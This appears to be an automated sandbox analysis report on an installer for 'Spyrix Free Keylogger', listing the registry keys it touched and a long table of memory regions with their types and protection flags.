|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
NoModify
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
NoRepair
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
InstallDate
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
MajorVersion
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
MinorVersion
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
VersionMajor
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
VersionMinor
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
EstimatedSize
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ActiveMovie\devenum
|
Version
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{FBF23B40-E3F0-101B-8488-00AA003E56F8} {000214E4-0000-0000-C000-000000000046} 0xFFFF
|
There are 39 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
3279000
|
heap
|
page read and write
|
||
C50000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
4190000
|
direct allocation
|
page execute and read and write
|
||
36EA000
|
direct allocation
|
page read and write
|
||
2AAF000
|
heap
|
page read and write
|
||
1F03FED0000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
33CE000
|
direct allocation
|
page execute and read and write
|
||
27405470000
|
trusted library allocation
|
page read and write
|
||
77E000
|
heap
|
page read and write
|
||
2C2E000
|
stack
|
page read and write
|
||
8E4000
|
unkown
|
page execute and write copy
|
||
274055F0000
|
remote allocation
|
page read and write
|
||
3B40000
|
direct allocation
|
page execute and read and write
|
||
324A000
|
heap
|
page read and write
|
||
10F0000
|
heap
|
page read and write
|
||
29C1000
|
heap
|
page read and write
|
||
8370000
|
direct allocation
|
page execute and read and write
|
||
2081000
|
direct allocation
|
page read and write
|
||
29AE000
|
heap
|
page read and write
|
||
4300000
|
direct allocation
|
page execute and read and write
|
||
869000
|
unkown
|
page execute and write copy
|
||
29A0000
|
heap
|
page read and write
|
||
31EB000
|
heap
|
page read and write
|
||
2FC0000
|
heap
|
page read and write
|
||
3F70000
|
direct allocation
|
page execute and read and write
|
||
2D00000
|
heap
|
page read and write
|
||
DD0000
|
heap
|
page read and write
|
||
5F2000
|
unkown
|
page readonly
|
||
31C4000
|
heap
|
page read and write
|
||
1CE89194000
|
heap
|
page read and write
|
||
34B5000
|
heap
|
page read and write
|
||
448F000
|
stack
|
page read and write
|
||
4ED4000
|
trusted library allocation
|
page read and write
|
||
2B09000
|
heap
|
page read and write
|
||
3268000
|
heap
|
page read and write
|
||
758000
|
heap
|
page read and write
|
||
23AF000
|
direct allocation
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
34C7000
|
heap
|
page read and write
|
||
586000
|
heap
|
page read and write
|
||
26C7000
|
direct allocation
|
page read and write
|
||
C3E000
|
stack
|
page read and write
|
||
3408000
|
direct allocation
|
page read and write
|
||
2AE1000
|
heap
|
page read and write
|
||
2740568F000
|
heap
|
page read and write
|
||
3260000
|
heap
|
page read and write
|
||
31E5000
|
heap
|
page read and write
|
||
790000
|
heap
|
page read and write
|
||
2308000
|
direct allocation
|
page read and write
|
||
6787000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
274056C3000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
274056E2000
|
heap
|
page read and write
|
||
17E1000
|
heap
|
page read and write
|
||
39DF000
|
stack
|
page read and write
|
||
777B000
|
heap
|
page read and write
|
||
2ADB000
|
heap
|
page read and write
|
||
3905000
|
heap
|
page read and write
|
||
111D000
|
trusted library allocation
|
page execute and read and write
|
||
F67000
|
heap
|
page read and write
|
||
71E000
|
heap
|
page read and write
|
||
12D000
|
stack
|
page read and write
|
||
7E20000
|
trusted library allocation
|
page read and write
|
||
2BBF000
|
stack
|
page read and write
|
||
F30000
|
heap
|
page read and write
|
||
E24000
|
heap
|
page read and write
|
||
503E000
|
stack
|
page read and write
|
||
1CE891AC000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
2B09000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
78E000
|
heap
|
page read and write
|
||
2200000
|
heap
|
page read and write
|
||
3242000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
3D10000
|
direct allocation
|
page execute and read and write
|
||
A84000
|
heap
|
page read and write
|
||
42A0000
|
direct allocation
|
page execute and read and write
|
||
34BA000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
36E0000
|
direct allocation
|
page execute and read and write
|
||
4F83000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
5900000
|
trusted library allocation
|
page execute and read and write
|
||
17A0000
|
heap
|
page read and write
|
||
22A5000
|
heap
|
page read and write
|
||
767000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
31AB000
|
heap
|
page read and write
|
||
7AC000
|
heap
|
page read and write
|
||
14B0000
|
heap
|
page read and write
|
||
C2E000
|
stack
|
page read and write
|
||
2AEB000
|
heap
|
page read and write
|
||
17A9000
|
heap
|
page read and write
|
||
31DB000
|
heap
|
page read and write
|
||
450000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
2AEB000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
29CB000
|
heap
|
page read and write
|
||
67A3000
|
heap
|
page read and write
|
||
2993000
|
heap
|
page read and write
|
||
174000
|
stack
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
2F1C000
|
stack
|
page read and write
|
||
7FD50000
|
direct allocation
|
page read and write
|
||
30A8000
|
trusted library allocation
|
page read and write
|
||
E1E000
|
heap
|
page read and write
|
||
41D0000
|
direct allocation
|
page execute and read and write
|
||
3390000
|
direct allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
2DBD000
|
trusted library allocation
|
page read and write
|
||
3EB0000
|
direct allocation
|
page execute and read and write
|
||
3EF1000
|
trusted library allocation
|
page read and write
|
||
3490000
|
direct allocation
|
page read and write
|
||
45C3000
|
direct allocation
|
page read and write
|
||
E34000
|
heap
|
page read and write
|
||
27405540000
|
trusted library allocation
|
page read and write
|
||
18DB000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
27405700000
|
heap
|
page read and write
|
||
159000
|
stack
|
page read and write
|
||
892EF7E000
|
unkown
|
page readonly
|
||
2D8D000
|
heap
|
page read and write
|
||
17E5000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
3A40000
|
direct allocation
|
page execute and read and write
|
||
400000
|
unkown
|
page readonly
|
||
2D90000
|
trusted library allocation
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
274056C1000
|
heap
|
page read and write
|
||
34DC000
|
direct allocation
|
page read and write
|
||
865000
|
unkown
|
page execute and write copy
|
||
766000
|
heap
|
page read and write
|
||
4150000
|
direct allocation
|
page execute and read and write
|
||
1B89000
|
heap
|
page read and write
|
||
7FDF0000
|
direct allocation
|
page read and write
|
||
27400D40000
|
trusted library allocation
|
page read and write
|
||
2F60000
|
heap
|
page read and write
|
||
4F79000
|
heap
|
page read and write
|
||
3227000
|
heap
|
page read and write
|
||
7B3000
|
heap
|
page read and write
|
||
237C000
|
direct allocation
|
page read and write
|
||
2FD0000
|
heap
|
page read and write
|
||
3BB0000
|
direct allocation
|
page execute and read and write
|
||
31C4000
|
heap
|
page read and write
|
||
A6AE000
|
stack
|
page read and write
|
||
346C000
|
direct allocation
|
page read and write
|
||
1205000
|
heap
|
page read and write
|
||
3400000
|
direct allocation
|
page execute and read and write
|
||
27400000000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
2B20000
|
remote allocation
|
page read and write
|
||
2F9E000
|
stack
|
page read and write
|
||
31CE000
|
heap
|
page read and write
|
||
36B0000
|
direct allocation
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
2980000
|
heap
|
page read and write
|
||
A3D000
|
stack
|
page read and write
|
||
7FE20000
|
direct allocation
|
page read and write
|
||
7E0000
|
heap
|
page read and write
|
||
22729B97000
|
heap
|
page read and write
|
||
E23000
|
heap
|
page read and write
|
||
14CE000
|
stack
|
page read and write
|
||
2B20000
|
remote allocation
|
page read and write
|
||
BDF000
|
stack
|
page read and write
|
||
FEE000
|
stack
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
125D000
|
stack
|
page read and write
|
||
29C1000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
502000
|
unkown
|
page write copy
|
||
274055F0000
|
remote allocation
|
page read and write
|
||
704000
|
heap
|
page read and write
|
||
750000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
BE6000
|
heap
|
page read and write
|
||
5EE000
|
unkown
|
page write copy
|
||
6BB000
|
unkown
|
page readonly
|
||
3A70000
|
direct allocation
|
page execute and read and write
|
||
3740000
|
direct allocation
|
page execute and read and write
|
||
361000
|
unkown
|
page execute read
|
||
6885000
|
heap
|
page read and write
|
||
4210000
|
direct allocation
|
page execute and read and write
|
||
7D0000
|
heap
|
page read and write
|
||
5400000
|
trusted library allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
2D10000
|
heap
|
page read and write
|
||
7FE15000
|
direct allocation
|
page read and write
|
||
97DE000
|
stack
|
page read and write
|
||
34B9000
|
heap
|
page read and write
|
||
E14000
|
heap
|
page read and write
|
||
36DC000
|
direct allocation
|
page read and write
|
||
31E5000
|
heap
|
page read and write
|
||
D8E000
|
stack
|
page read and write
|
||
6A70000
|
direct allocation
|
page read and write
|
||
29CB000
|
heap
|
page read and write
|
||
34EF000
|
stack
|
page read and write
|
||
10FD000
|
heap
|
page read and write
|
||
383E000
|
stack
|
page read and write
|
||
1113000
|
trusted library allocation
|
page execute and read and write
|
||
3305000
|
direct allocation
|
page read and write
|
||
4090000
|
direct allocation
|
page execute and read and write
|
||
98E000
|
stack
|
page read and write
|
||
E3B000
|
heap
|
page read and write
|
||
53A0000
|
heap
|
page read and write
|
||
4420000
|
direct allocation
|
page execute and read and write
|
||
1CE89185000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
61E88000
|
unkown
|
page read and write
|
||
230F000
|
direct allocation
|
page read and write
|
||
4EAC4CD000
|
stack
|
page read and write
|
||
10F9000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
3D50000
|
direct allocation
|
page execute and read and write
|
||
42E0000
|
direct allocation
|
page execute and read and write
|
||
2740562C000
|
heap
|
page read and write
|
||
3540000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
24F0000
|
heap
|
page read and write
|
||
21FE000
|
stack
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
3640000
|
direct allocation
|
page execute and read and write
|
||
E54000
|
heap
|
page read and write
|
||
3281000
|
heap
|
page read and write
|
||
500000
|
unkown
|
page execute read
|
||
17E9000
|
heap
|
page read and write
|
||
6782000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
780000
|
heap
|
page read and write
|
||
E1F000
|
heap
|
page read and write
|
||
1123000
|
trusted library allocation
|
page read and write
|
||
6B7000
|
unkown
|
page write copy
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
3321000
|
direct allocation
|
page read and write
|
||
770000
|
heap
|
page read and write
|
||
33D0000
|
direct allocation
|
page execute and read and write
|
||
34C1000
|
heap
|
page read and write
|
||
2740564C000
|
heap
|
page read and write
|
||
4360000
|
direct allocation
|
page execute and read and write
|
||
35C0000
|
direct allocation
|
page execute and read and write
|
||
7AC000
|
heap
|
page read and write
|
||
96E000
|
heap
|
page read and write
|
||
2CD8000
|
heap
|
page read and write
|
||
37AA000
|
heap
|
page read and write
|
||
31DA000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
892FD7E000
|
unkown
|
page readonly
|
||
400000
|
unkown
|
page readonly
|
||
4DAE000
|
heap
|
page read and write
|
||
F40000
|
heap
|
page read and write
|
||
2989000
|
heap
|
page read and write
|
||
4FE0000
|
heap
|
page read and write
|
||
31B3000
|
heap
|
page read and write
|
||
8160000
|
trusted library allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
41E0000
|
direct allocation
|
page execute and read and write
|
||
863000
|
unkown
|
page execute and read and write
|
||
4FE8000
|
heap
|
page read and write
|
||
7FE11000
|
direct allocation
|
page read and write
|
||
53C0000
|
trusted library allocation
|
page execute and read and write
|
||
A84000
|
heap
|
page read and write
|
||
791F000
|
stack
|
page read and write
|
||
8184000
|
trusted library allocation
|
page read and write
|
||
7701000
|
direct allocation
|
page read and write
|
||
5EE000
|
unkown
|
page read and write
|
||
4FE7000
|
heap
|
page read and write
|
||
2DB1000
|
trusted library allocation
|
page read and write
|
||
7A50000
|
heap
|
page read and write
|
||
26DC000
|
direct allocation
|
page read and write
|
||
34BE000
|
heap
|
page read and write
|
||
33FE000
|
stack
|
page read and write
|
||
24A0000
|
direct allocation
|
page read and write
|
||
4FED000
|
stack
|
page read and write
|
||
6CD000
|
stack
|
page read and write
|
||
2D50000
|
heap
|
page read and write
|
||
E3F000
|
heap
|
page read and write
|
||
7B2000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
2A8F000
|
stack
|
page read and write
|
||
4EB0000
|
trusted library allocation
|
page read and write
|
||
4B8E000
|
stack
|
page read and write
|
||
56DB000
|
stack
|
page read and write
|
||
3D00000
|
direct allocation
|
page execute and read and write
|
||
13CE000
|
stack
|
page read and write
|
||
351E000
|
stack
|
page read and write
|
||
38F0000
|
direct allocation
|
page execute and read and write
|
||
1CE892D0000
|
heap
|
page read and write
|
||
D2F000
|
stack
|
page read and write
|
||
2AE5000
|
heap
|
page read and write
|
||
2AEC000
|
heap
|
page read and write
|
||
6520000
|
direct allocation
|
page read and write
|
||
450000
|
heap
|
page read and write
|
||
A8ED000
|
stack
|
page read and write
|
||
78B000
|
heap
|
page read and write
|
||
892F17E000
|
unkown
|
page readonly
|
||
A84000
|
heap
|
page read and write
|
||
15B0000
|
heap
|
page read and write
|
||
2DF0000
|
heap
|
page read and write
|
||
361000
|
unkown
|
page execute read
|
||
678A000
|
heap
|
page read and write
|
||
105C000
|
stack
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
E39000
|
heap
|
page read and write
|
||
35A0000
|
direct allocation
|
page execute and read and write
|
||
A84000
|
heap
|
page read and write
|
||
2CC0000
|
trusted library allocation
|
page read and write
|
||
29BB000
|
heap
|
page read and write
|
||
360000
|
unkown
|
page readonly
|
||
2FDE000
|
stack
|
page read and write
|
||
3242000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
3680000
|
direct allocation
|
page execute and read and write
|
||
2D39000
|
heap
|
page read and write
|
||
8790000
|
trusted library allocation
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
27400902000
|
heap
|
page read and write
|
||
34A3000
|
heap
|
page read and write
|
||
17F9000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
2400000
|
heap
|
page read and write
|
||
76D0000
|
direct allocation
|
page read and write
|
||
33C6000
|
heap
|
page read and write
|
||
6B6000
|
unkown
|
page read and write
|
||
951E000
|
stack
|
page read and write
|
||
3496000
|
direct allocation
|
page read and write
|
||
96D000
|
heap
|
page read and write
|
||
1212000
|
heap
|
page read and write
|
||
20A0000
|
direct allocation
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
3FC0000
|
direct allocation
|
page execute and read and write
|
||
985E000
|
stack
|
page read and write
|
||
3FD000
|
stack
|
page read and write
|
||
6B6000
|
unkown
|
page write copy
|
||
1E7000
|
heap
|
page read and write
|
||
38F9000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
17AF000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
2CF1000
|
heap
|
page read and write
|
||
2D30000
|
heap
|
page read and write
|
||
2A00000
|
trusted library allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
2FF0000
|
heap
|
page read and write
|
||
76F11FF000
|
stack
|
page read and write
|
||
3E80000
|
direct allocation
|
page execute and read and write
|
||
F72FCC000
|
stack
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
23DA000
|
direct allocation
|
page read and write
|
||
20AF000
|
direct allocation
|
page read and write
|
||
A80000
|
heap
|
page read and write
|
||
587000
|
heap
|
page read and write
|
||
3210000
|
direct allocation
|
page execute and read and write
|
||
31C4000
|
heap
|
page read and write
|
||
1CE891EE000
|
heap
|
page read and write
|
||
890000
|
unkown
|
page execute and read and write
|
||
31EB000
|
heap
|
page read and write
|
||
2B00000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
31CE000
|
heap
|
page read and write
|
||
7FE10000
|
direct allocation
|
page read and write
|
||
17E5000
|
heap
|
page read and write
|
||
9EA000
|
unkown
|
page execute and read and write
|
||
8EC0000
|
heap
|
page execute and read and write
|
||
2348000
|
direct allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
3270000
|
heap
|
page read and write
|
||
BFD000
|
stack
|
page read and write
|
||
2FA0000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
2D44000
|
heap
|
page read and write
|
||
51AF000
|
stack
|
page read and write
|
||
6BA000
|
unkown
|
page write copy
|
||
4F1F000
|
heap
|
page read and write
|
||
8FE000
|
stack
|
page read and write
|
||
709000
|
heap
|
page read and write
|
||
2AE5000
|
heap
|
page read and write
|
||
643F000
|
stack
|
page read and write
|
||
2B64000
|
heap
|
page read and write
|
||
1100000
|
trusted library allocation
|
page read and write
|
||
2099000
|
direct allocation
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
7646000
|
direct allocation
|
page read and write
|
||
2994000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
4902000
|
direct allocation
|
page read and write
|
||
1F03FEA0000
|
heap
|
page read and write
|
||
2B3B000
|
heap
|
page read and write
|
||
3960000
|
direct allocation
|
page execute and read and write
|
||
A84000
|
heap
|
page read and write
|
||
559E000
|
stack
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
27401040000
|
trusted library section
|
page readonly
|
||
C40000
|
heap
|
page read and write
|
||
FAE000
|
stack
|
page read and write
|
||
4F02000
|
heap
|
page read and write
|
||
2AAB000
|
heap
|
page read and write
|
||
E2F000
|
heap
|
page read and write
|
||
1B6F000
|
stack
|
page read and write
|
||
4370000
|
direct allocation
|
page execute and read and write
|
||
20B6000
|
direct allocation
|
page read and write
|
||
361000
|
unkown
|
page execute read
|
||
334F000
|
stack
|
page read and write
|
||
99CE000
|
stack
|
page read and write
|
||
570000
|
heap
|
page read and write
|
||
3600000
|
direct allocation
|
page execute and read and write
|
||
684A000
|
heap
|
page read and write
|
||
4FB0000
|
heap
|
page read and write
|
||
2CAC000
|
stack
|
page read and write
|
||
3860000
|
direct allocation
|
page execute and read and write
|
||
77B5000
|
heap
|
page read and write
|
||
2B4B000
|
heap
|
page read and write
|
||
3B20000
|
direct allocation
|
page execute and read and write
|
||
4F75000
|
heap
|
page read and write
|
||
17F1000
|
heap
|
page read and write
|
||
3340000
|
direct allocation
|
page execute and read and write
|
||
E00000
|
heap
|
page read and write
|
||
7FE38000
|
direct allocation
|
page read and write
|
||
52AF000
|
stack
|
page read and write
|
||
3670000
|
direct allocation
|
page execute and read and write
|
||
1E7000
|
heap
|
page read and write
|
||
1FB0000
|
direct allocation
|
page read and write
|
||
268D000
|
direct allocation
|
page read and write
|
||
38FD000
|
heap
|
page read and write
|
||
652A000
|
direct allocation
|
page read and write
|
||
4F00000
|
trusted library allocation
|
page read and write
|
||
12BF000
|
heap
|
page read and write
|
||
79B000
|
stack
|
page read and write
|
||
4F1F000
|
heap
|
page read and write
|
||
E25000
|
heap
|
page read and write
|
||
C40000
|
heap
|
page read and write
|
||
3A50000
|
direct allocation
|
page execute and read and write
|
||
34A7000
|
heap
|
page read and write
|
||
892ED7E000
|
unkown
|
page readonly
|
||
892E97E000
|
unkown
|
page readonly
|
||
31C4000
|
heap
|
page read and write
|
||
7270000
|
trusted library allocation
|
page read and write
|
||
2D65000
|
heap
|
page read and write
|
||
457B000
|
direct allocation
|
page read and write
|
||
7FD49000
|
direct allocation
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
7FC50000
|
direct allocation
|
page read and write
|
||
3910000
|
direct allocation
|
page execute and read and write
|
||
2C70000
|
heap
|
page read and write
|
||
22729B10000
|
heap
|
page read and write
|
||
506000
|
unkown
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
75BC000
|
stack
|
page read and write
|
||
9B5D000
|
stack
|
page read and write
|
||
360000
|
unkown
|
page readonly
|
||
1000000
|
heap
|
page read and write
|
||
232C000
|
direct allocation
|
page read and write
|
||
4F1F000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
7820000
|
trusted library allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
13FD000
|
stack
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
38F5000
|
heap
|
page read and write
|
||
940000
|
heap
|
page read and write
|
||
31E5000
|
heap
|
page read and write
|
||
327F000
|
stack
|
page read and write
|
||
41B0000
|
direct allocation
|
page execute and read and write
|
||
2DAE000
|
trusted library allocation
|
page read and write
|
||
3BA0000
|
direct allocation
|
page execute and read and write
|
||
38F9000
|
heap
|
page read and write
|
||
31EB000
|
heap
|
page read and write
|
||
3AB0000
|
direct allocation
|
page execute and read and write
|
||
4F75000
|
heap
|
page read and write
|
||
8160000
|
trusted library allocation
|
page read and write
|
||
600000
|
heap
|
page read and write
|
||
226F000
|
direct allocation
|
page read and write
|
||
3EF9000
|
trusted library allocation
|
page read and write
|
||
550000
|
heap
|
page read and write
|
||
9C5E000
|
stack
|
page read and write
|
||
2AB4000
|
heap
|
page read and write
|
||
3C50000
|
direct allocation
|
page execute and read and write
|
||
7FD1C000
|
direct allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
3240000
|
heap
|
page read and write
|
||
51EE000
|
stack
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
D30000
|
heap
|
page read and write
|
||
892EC7B000
|
stack
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
3D90000
|
direct allocation
|
page execute and read and write
|
||
F5A000
|
heap
|
page read and write
|
||
17D1000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
965F000
|
stack
|
page read and write
|
||
274055C0000
|
trusted library allocation
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
775F000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
31D0000
|
trusted library allocation
|
page read and write
|
||
72A000
|
heap
|
page read and write
|
||
73A000
|
heap
|
page read and write
|
||
702000
|
heap
|
page read and write
|
||
298B000
|
heap
|
page read and write
|
||
29BA000
|
heap
|
page read and write
|
||
37A3000
|
heap
|
page read and write
|
||
31E1000
|
heap
|
page read and write
|
||
2316000
|
direct allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
23D0000
|
heap
|
page read and write
|
||
34B6000
|
heap
|
page read and write
|
||
37A2000
|
heap
|
page read and write
|
||
3250000
|
heap
|
page read and write
|
||
3277000
|
heap
|
page read and write
|
||
274000FF000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
892F1FE000
|
stack
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
75E0000
|
direct allocation
|
page read and write
|
||
6C0000
|
heap
|
page read and write
|
||
4140000
|
direct allocation
|
page execute and read and write
|
||
892F07E000
|
unkown
|
page readonly
|
||
7E6000
|
heap
|
page read and write
|
||
2DE0000
|
heap
|
page execute and read and write
|
||
8790000
|
trusted library allocation
|
page read and write
|
||
1E7000
|
heap
|
page read and write
|
||
BA9000
|
stack
|
page read and write
|
||
6B73000
|
direct allocation
|
page read and write
|
||
2C3F000
|
stack
|
page read and write
|
||
31B0000
|
heap
|
page read and write
|
||
513000
|
unkown
|
page readonly
|
||
1160000
|
trusted library allocation
|
page read and write
|
||
3FD0000
|
direct allocation
|
page execute and read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
79FD000
|
stack
|
page read and write
|
||
2281000
|
direct allocation
|
page read and write
|
||
274055D0000
|
trusted library allocation
|
page read and write
|
||
44A0000
|
direct allocation
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
777F000
|
heap
|
page read and write
|
||
7CC000
|
heap
|
page read and write
|
||
E39000
|
heap
|
page read and write
|
||
61E00000
|
unkown
|
page readonly
|
||
38F6000
|
heap
|
page read and write
|
||
3000000
|
trusted library allocation
|
page read and write
|
||
4CCE000
|
stack
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
5A1000
|
unkown
|
page write copy
|
||
2D8D000
|
heap
|
page read and write
|
||
695E000
|
stack
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
772000
|
heap
|
page read and write
|
||
750000
|
heap
|
page read and write
|
||
314E000
|
stack
|
page read and write
|
||
804000
|
heap
|
page read and write
|
||
17E1000
|
heap
|
page read and write
|
||
31B4000
|
heap
|
page read and write
|
||
1CE891D4000
|
heap
|
page read and write
|
||
22729B20000
|
heap
|
page read and write
|
||
1CE891B5000
|
heap
|
page read and write
|
||
36F0000
|
direct allocation
|
page execute and read and write
|
||
7FD42000
|
direct allocation
|
page read and write
|
||
3ED0000
|
direct allocation
|
page execute and read and write
|
||
412000
|
unkown
|
page write copy
|
||
32A0000
|
heap
|
page read and write
|
||
31AC000
|
heap
|
page read and write
|
||
892FB7E000
|
unkown
|
page readonly
|
||
6771000
|
heap
|
page read and write
|
||
17DA000
|
heap
|
page read and write
|
||
1A2F000
|
stack
|
page read and write
|
||
59C0000
|
trusted library allocation
|
page read and write
|
||
3630000
|
direct allocation
|
page execute and read and write
|
||
31C4000
|
heap
|
page read and write
|
||
3900000
|
heap
|
page read and write
|
||
4EE0000
|
trusted library allocation
|
page read and write
|
||
334E000
|
stack
|
page read and write
|
||
17B4000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
4FE7000
|
heap
|
page read and write
|
||
3AA0000
|
direct allocation
|
page execute and read and write
|
||
C3E000
|
stack
|
page read and write
|
||
E2C000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
3E20000
|
direct allocation
|
page execute and read and write
|
||
975000
|
heap
|
page read and write
|
||
3570000
|
direct allocation
|
page execute and read and write
|
||
1698000
|
heap
|
page read and write
|
||
38C0000
|
direct allocation
|
page execute and read and write
|
||
4F1F000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
2800000
|
heap
|
page read and write
|
||
1843000
|
heap
|
page read and write
|
||
1120000
|
trusted library allocation
|
page read and write
|
||
31E1000
|
heap
|
page read and write
|
||
44CC000
|
direct allocation
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
775000
|
heap
|
page read and write
|
||
807000
|
heap
|
page read and write
|
||
4501000
|
direct allocation
|
page read and write
|
||
6BA000
|
unkown
|
page write copy
|
||
E23000
|
heap
|
page read and write
|
||
764000
|
heap
|
page read and write
|
||
5660000
|
trusted library section
|
page readonly
|
||
40D0000
|
direct allocation
|
page execute and read and write
|
||
27405600000
|
heap
|
page read and write
|
||
2DD0000
|
heap
|
page read and write
|
||
1CE89290000
|
remote allocation
|
page read and write
|
||
2ACE000
|
heap
|
page read and write
|
||
892F57E000
|
unkown
|
page readonly
|
||
335E000
|
direct allocation
|
page read and write
|
||
17DB000
|
heap
|
page read and write
|
||
3F80000
|
direct allocation
|
page execute and read and write
|
||
DF0000
|
heap
|
page read and write
|
||
751000
|
heap
|
page read and write
|
||
2CE0000
|
heap
|
page read and write
|
||
2950000
|
remote allocation
|
page read and write
|
||
